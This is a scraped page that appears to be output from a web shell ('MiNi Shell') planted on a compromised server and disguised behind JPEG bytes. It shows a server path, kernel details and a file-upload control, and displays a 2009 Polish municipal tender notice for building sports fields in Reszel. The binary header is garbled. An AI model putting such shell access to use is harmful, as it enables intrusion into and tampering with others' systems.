JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090522/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090522/163508-N-2009.html

<p class="kh_header"><b>Reszel: Wykonanie boisk sportowych w ramach budowy kompleksu Moje Boisko- Orlik 2012 z zagospodarowaniem działek: nr 99/5; 103/1; 104; 106.</b><br>
<b>Numer ogłoszenia: 163508 - 2009; data zamieszczenia: 22.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Reszel , Rynek 24, 11-440 Reszel, woj. warmińsko-mazurskie, tel. (089) 755 00 31, faks (089) 7550031.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.reszel.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie boisk sportowych w ramach budowy kompleksu Moje Boisko- Orlik 2012 z zagospodarowaniem działek: nr 99/5; 103/1; 104; 106..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie boisk sportowych w ramach budowy kompleksu Moje Boisko- Orlik 2012 z zagospodarowaniem działek: nr 99/5; 103/1; 104; 106.
2.Przedmiot zamówienia obejmuje:
2.1. Budowę boiska do piłki nożnej o wymiarach 30,0 m x 62,0m o pow. całkowitej 1860m2 ( pole gry 26,0 x 56,0 m)
-nawierzchnia do piłki nożnej - sztuczna trawa wys. 6,0 cm z zasypką,
-podbudowa dynamiczna przepuszczalna, 
-nawierzchnia trawa syntetyczna, 
-warstwa wyrównująca z miału kamiennego(fr.0-4mm)4 cm, 
-warstwa klinująca  z kruszywa kamiennego (fr.0-31,5mm)5cm,
-warstwa konstrukcyjna z kruszywa kamiennego (fr.31,5-63mm)15,0cm,
-warstwa odsączająca z piasku lub pospółki 20,0cm,
-drenaż,
-grunt wymieniony na niewysadzinowy do gł. przemarzania.
Wysokość włókna min. 60 mm na podbudowie z kruszywa (wypełnienie z trawy zgodnie z badaniem specjalistycznego laboratorium np. Labosport) 
1.	Typ włókna: monofil
2.	 Skład chemiczny włókna; polietylen
3.	Ciężar włókna: min. 11.000 Dtex,
4.	Gęstość trawy: min. 97.000 włókien /m2
Parametry techniczno - eksploatacyjne zasypki powinny być zgodne z wymaganiami Projektu 
typowego Ministerstwa Sportu i Turystyki i nie powodować uciążliwych zapachów i 
zabrudzeń w wyższych temperaturach zewnętrznych.
Nawierzchnia syntetyczna typu sztuczna trawa o właściwościach i technologii układania
określonych w dokumentacji projektowej (załącznik nr 3 do SIWZ) i SST w tym 
SPECYFIKACJE UZUPEŁNIAJĄCE SST (załącznik nr 2 do SIWZ) z uwzględnieniem 
zmian na podstawie uzgodnienia w Ministerstwie Sportu i Turystyki.
- obrzeża betonowe na ławie betonowej oddzielające sąsiednie elementy terenu od płyty
boiska.  
Wszystkie elementy zgodne z właściwościami określonymi w dokumentacji technicznej.
Roboty należy wykonać zgodnie z dokumentacją projektową ( załącznik nr 3 do SIWZ) i SST (załącznik nr 2 do SIWZ).   
- Wyposażenie:
- bramki aluminiowe mocowane w tulejach				- 2 sztuki
- siatki do bramek                                        				- 2 sztuki
2.2.Budowę boiska wielofunkcyjnego o wymiarach 30 x 50 m o powierzchni 1500 m2 (pole do  gry 20 x 40 m).
 Podbudowa:
-podbudowa dynamiczna przepuszczalna.
Wszystkie elementy zgodne z właściwościami określonymi w dokumentacji projektowej (załącznik nr 3 do SIWZ). Roboty należy wykonać zgodnie z dokumentacją projektową 
(załącznik nr 3 do SIWZ) do i SST w tym SPECYFIKACJE UZUPEŁNIAJĄCE
SST(załącznik nr 2 do SIWZ) ) z uwzględnieniem zmian na podstawie uzgodnienia w 
Ministerstwie Sportu i Turystyki.
Nawierzchnia boiska wielofunkcyjnego:
-nawierzchnia poliuretanowa, wykonana o właściwościach i technologii układania
określonych w dokumentacji projektowej (załącznik nr 3 do SIWZ) i SST w tym 
SPECYFIKACJE UZUPEŁNIAJĄCE SST (załącznik nr 2 do SIWZ). 
Technologia układania nawierzchni:
Technologia typu NATRYSK - na podbudowie z kruszywa kamiennego instaluje się warstwę przepuszczalną dla wody i warstwę stabilizującą typu ET. Następnie warstwę gr. 10-11 mm z granulatu SBR, następnie warstwę natrysku (mieszanka granulatu EPDM zmieszana z PU) o grubości 2-3mm.
Projektowana konstrukcja nawierzchni przystosowana do warunków miejscowych z uwzględnieniem zmian na podstawie uzgodnienia w Ministerstwie Sportu i Turystyki.:
-warstwa poliuretanowa 1,3cm,
-warstwa elastyczna przepuszczalna podkładowa: CONIPUR ET gr.3,5cm lub o podobnych
parametrach techniczno-eksploatacyjnych które spełniają wymagania Ministerstwa Sportu i 
Turystyki.
-warstwa klinująca  z kruszywa kamiennego (fr.0-31,5mm)5cm,
-warstwa konstrukcyjna z kruszywa łamanego (fr.31,5-63mm)15,0cm,
-warstwa odsączająca z piasku 35,0cm,
-geowłóknina separacyjna,
-drenaż,
-koryto - grunt rodzimy.
 Na boisku znajdować się będą następujące pola gier: 
-boisko do piłki ręcznej wzdłuż,
-2 boiska do koszykówki wszerz,
-2 pola gry do siatkówki wszerz, z otworami na słupki i tulejami maskującymi, rozstaw między słupkami 10,0m,
-2 pola gry do tenisa ziemnego wszerz, z otworami na słupki i tulejami maskującymi, rozstaw między słupkami 12,8m.

Wyposażenie do piłki koszykowej
- obręcz do koszykówki standard i siatka do obręczy			  - 4 sztuki
- tablica do koszykówki epoksydowa o wym. 105 x 180cm 		  - 4 sztuki
- mechanizm regulacji wysokości 					              - 4 sztuki
- konstrukcja do koszykówki dwusłupowa, montowana w tulejach              - 4 zestawy
zgodnie z opisem PT Archtektura przystosowanym do warunków miejscowych z uwzględnieniem zmian na podstawie uzgodnienia w Ministerstwie Sportu i Turystyki.
Wyposażenie  do piłki siatkowej
- słupki do siatkówki, aluminiowe wielofunkcyjne (badm. tenis, siatkówka) - 2 zestawy
- siatka do siatkówki 							                - 2 sztuki
Wyposażenie do piłki ręcznej
- bramki aluminiowe mocowane w tulejach					     - 2 sztuki
- siatki do bramek                                                                                              - 2 sztuki                                        
2.3. Ogrodzenie terenu
Szczegółowe rozwiązania wg dokumentacji projektowej ( załącznik nr 3 do SIWZ) oraz SST 
w tym SPECYFIKACJE UZUPEŁNIAJĄCE SST (załącznik nr 2 do SIWZ) z uwzględnieniem zmian na podstawie uzgodnienia w Ministerstwie Sportu i Turystyki.
2.4. Oświetlenie terenu 
a/.Oświetlenie obiektu będą stanowiły projektory zamocowane na masztach o wysokości min. 9m zgodnie z projektami: budowlanym i wykonawczym.
b/.Oświetlenie  uliczne drogi dojazdowej, placu i miejsc postojowych.
c/.Oświetlenie parkowe ciągu pieszego.
 Szczegółowe rozwiązania wg dokumentacji projektowej (załącznik nr 3 do SIWZ) oraz SST 
w tym SPECYFIKACJE UZUPEŁNIAJĄCE SST (załącznik nr 2 do SIWZ) z 
uwzględnieniem zmian na podstawie uzgodnienia w Ministerstwie Sportu i Turystyki.
2.5. Chodniki
Ciągi komunikacyjne i powierzchnia przeznaczona pod kontener (na odpadki stałe) - kostka polbrukowa gr. min 6 cm oraz 8 cm w zależności od przeznaczenia nawierzchni na podstawie projektów: budowlanego i wykonawczego na podbudowie z piasku i kruszywa, zamknięta obrzeżem betonowym.
a/.Droga dojazdowa , plac, miejsca postojowe.
b/.Ciąg pieszy. 
Szczegółowe rozwiązania wg dokumentacji projektowej (załącznik nr 3 do SIWZ) oraz SST 
w tym SPECYFIKACJE UZUPEŁNIAJĄCE SST ( zał. Nr 2 do SIWZ) według projektu budowlanego wykonawczego z uwzględnieniem zmian na podstawie uzgodnienia w Ministerstwie Sportu i Turystyki.
2.6. Budynek zaplecza szatniowo-sanitarnego Standard +. 
Fundamenty, pokrycia dachowe, obróbki blacharskie, rynny i rury spustowe, stolarka okienna i roboty związane z ich wykonaniem należy wykonać zgodnie z dokumentacją projektową 
(załącznik nr 3 do SIWZ) i SST w tym SPECYFIKACJE UZUPEŁNIAJĄCE SST (załącznik nr 2 do SIWZ) z uwzględnieniem zmian na podstawie uzgodnienia w Ministerstwie Sportu i Turystyki.      
2.7. Szczegółowy opis przedmiotu zamówienia stanowią załączniki:
Załącznik Nr 1 do SIWZ - Specyfikacja techniczna wykonania i odbioru robót.
Załącznik Nr 2 do SIWZ - Szczegółowe Specyfikacje Techniczne wykonania i odbioru   
                                           robót w tym SPECYFIKACJE UZUPEŁNIAJĄCE SST.
Załącznik Nr 3 do SIWZ - Dokumentacja projektowa zawierająca projekty budowlane i 
wykonawcze z opisami, wytycznymi, wymaganiami, zastrzeżeniami w zakresie         uzgodnień realizacyjnych i technologicznych, zgłoszeń, odbiorów, pozwoleń wykonywania prób, badań, między innymi wyników zagęszczania, aprobat technicznych, atestów, certyfikatów zgodności wydanych przez jednostki uprawnione. 
Załącznik Nr 4 do SIWZ  - Przedmiary robót, Kosztorysy ofertowe ślepe.

3.Budowa, dostawa i montaż budynku sanitarno-szatniowego w wersji standard+
3.1. Szczegółowy opis przedmiotu zamówienia stanowią załączniki:
Załącznik Nr 5 do SIWZ -  Specyfikacja techniczna wykonania i odbioru robót.
Załącznik Nr 6 do SIWZ -  Szczegółowe Specyfikacje Techniczne wykonania i odbioru robót  
                                            w tym SPECYFIKACJE UZUPEŁNIAJĄCE SST.
Załącznik Nr 7 do SIWZ -  Dokumentacja projektowa zawierająca projekty budowlane i 
wykonawcze z opisami, wytycznymi, wymaganiami, zastrzeżeniami w zakresie         uzgodnień realizacyjnych i technologicznych, zgłoszeń, odbiorów, pozwoleń wykonywania prób, badań, między innymi wyników zagęszczania, aprobat technicznych, atestów, certyfikatów zgodności wydanych przez jednostki uprawnione. 
Załącznik Nr 8 do SIWZ -  Przedmiary robót, Kosztorysy ofertowe ślepe..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1, 45.23.30.00-9, 45.42.11.60-3, 45.11.12.00-0, 45.31.53.30-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 46.000,00 zł (słownie złotych: czterdzieści sześć tysięcy złotych).
2.Wykonawca może wnieść wadium jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr z 2007 Nr 42, poz. 275).
3.Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego: Bank Spółdzielczy w Reszlu  Nr 04885100082001000001010001 W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
5.W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego Reszel, ul. Rynek 24 w kancelarii Burmistrza Reszla lub dołączyć do oferty.
6.Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 4 ustawy, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału określone w art. 22 ust. 1 ustawy Pzp. 

1.1.	Spełnienie warunków udziału odnoszących się do posiadania niezbędnej wiedzy i doświadczenia, dysponowania osobami zdolnymi do wykonania zamówienia oraz sytuacji finansowej i ekonomicznej zostanie ocenione według poniższych zasad :
1) udokumentowane należyte wykonanie, w ciągu ostatnich 5 lat przed dniem wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych polegających na budowie boisk sportowych w tym: dwóch boisk piłkarskich z nawierzchnią z trawy syntetycznej i dwóch boisk z nawierzchnią poliuretanową (z podaniem ich wartości, dat wykonania oraz odbiorców).
2) udokumentowane należyte wykonanie, w ciągu ostatnich 5 lat przed dniem wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych polegających na budowie ciągów komunikacyjnych, dróg z nawierzchnią z kostki polbrukowej w tym przynajmniej jednego ciągu o powierzchni zbliżonej do niniejszego postępowania(z podaniem ich wartości, dat wykonania oraz odbiorców). 
a)	dysponowaniem w celu wykonania zamówienia przynajmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi o specjalności   konstrukcyjno-budowlanej, drogowej, 
b)	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, 
c)	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.

3)ubezpieczenie Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 500 000 PLN. 

2.	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.
3.	Zamawiający wezwie w trybie art.26 ust.3 Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub, którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie chyba, że mimo ich uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 - Wykonawca składa oświadczenia, których wzór stanowią Załącznik Nr 6 oraz Załącznik Nr 7 do niniejszej SIWZ.

1.W celu potwierdzenia, że Wykonawca posiada uprawnienia do określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust.1 ustawy do oferty dołączyć należy:

1)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2)Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego, potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
3)Aktualne zaświadczenie oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

2.W celu potwierdzenia spełnienia warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania osobami zdolnymi do wykonania zamówienia do oferty dołączyć należy:

1) Wykaz wykonanych w ciągu ostatnich 5 lat przed dniem wszczęciem postępowania tj. przed datą publikacji ogłoszenia o zamówieniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych polegających na budowie boisk sportowych  w tym: dwóch boisk piłkarskich z nawierzchnią z trawy syntetycznej i dwóch boisk z nawierzchnią poliuretanową. Wykonawca zobowiązany jest dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (referencje, protokoły odbioru, itp.) 
2) Wykaz wykonanych w ciągu ostatnich 5 lat przed dniem wszczęciem postępowania tj. przed datą publikacji ogłoszenia o zamówieniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych polegających na budowie ciągów komunikacyjnych, dróg z nawierzchnią z kostki polbrukowej w tym przynajmniej jednego ciągu o powierzchni zbliżonej do niniejszego postępowania .Do wykazu Wykonawca zobowiązany jest dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (referencje, protokoły odbioru, itp.) Wykaz należy sporządzić zgodnie ze wzorem stanowiącym Załącznik Nr 5 do niniejszej SIWZ.
3) Dokumenty potwierdzające posiadanie uprawnień budowlanych do kierowania robotami budowlanymi przez wskazane osoby w zakresie niezbędnym do wykonania zamówienia w specjalnościach: 
a) konstrukcyjno-budowlanej, drogowej, 
b) instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
c)instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
oraz aktualne zaświadczenia, wydane przez właściwą izbę samorządu zawodowego (Okręgową Izbę Inżynierów Budownictwa), potwierdzające wpis danej osoby na listę członków właściwej izby.

3.W celu potwierdzenia spełnienia warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia do oferty dołączyć należy:
1)Polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 500 000 PLN. 
Przy składaniu ofert przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy mogą złożyć jedną wspólną polisę potwierdzającą, że wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 500 000 PLN.
4.Wykaz aktualnych oświadczeń lub dokumentów potwierdzających spełnianie warunków jakościowych, które należy dołączyć do oferty:
         A. Dokumenty dotyczące nawierzchni poliuretanowej:

1.Certyfikat lub deklaracja zgodności z normą PN-EN 14877:2008, lub 
aprobata techniczna ITB, lub 
rekomendacja techniczna ITB, lub 
wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, lub dokument równoważny.
2.	Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
3.	Atest PZH dla oferowanej nawierzchni.
4.	Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.
       B.Dokumenty dotyczące nawierzchni z trawy syntetycznej:

1.	Raport z badań przeprowadzonych przez laboratorium (Labosport lub ISA-Sport lub Sports Labs Ltd), dotyczący oferowanej nawierzchni, potwierdzający zgodność jej parametrów z Handbook of Test Methods for Football Turf (dostępny na FIFA.com).
2.	Certyfikat lub deklaracja zgodności z normą PN-EN 15330-1:2008, lub
aprobata techniczna ITB, lub 
rekomendacja techniczna ITB, lub
wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, ISA-Sport, Sports Labs Ltd lub dokument równoważny. 
3.	Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
4.	Atest PZH dla oferowanej nawierzchni.
5.	Autoryzacja producenta trawy syntetycznej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - Termin wykonania - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/reszel_gmina_miejsko_-_wiejska/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Reszlu, Dział Techniczno - Budowlany, ul. Reymonta 1-4, pok. nr 2, 11 - 440 Reszel, w godzinach urzędowania Zamawiającego..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2009 godzina 10:00, miejsce: Sekretariat Urzędu Gminy w Reszlu, ul. Rynek 24, 11 - 440 Reszel..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com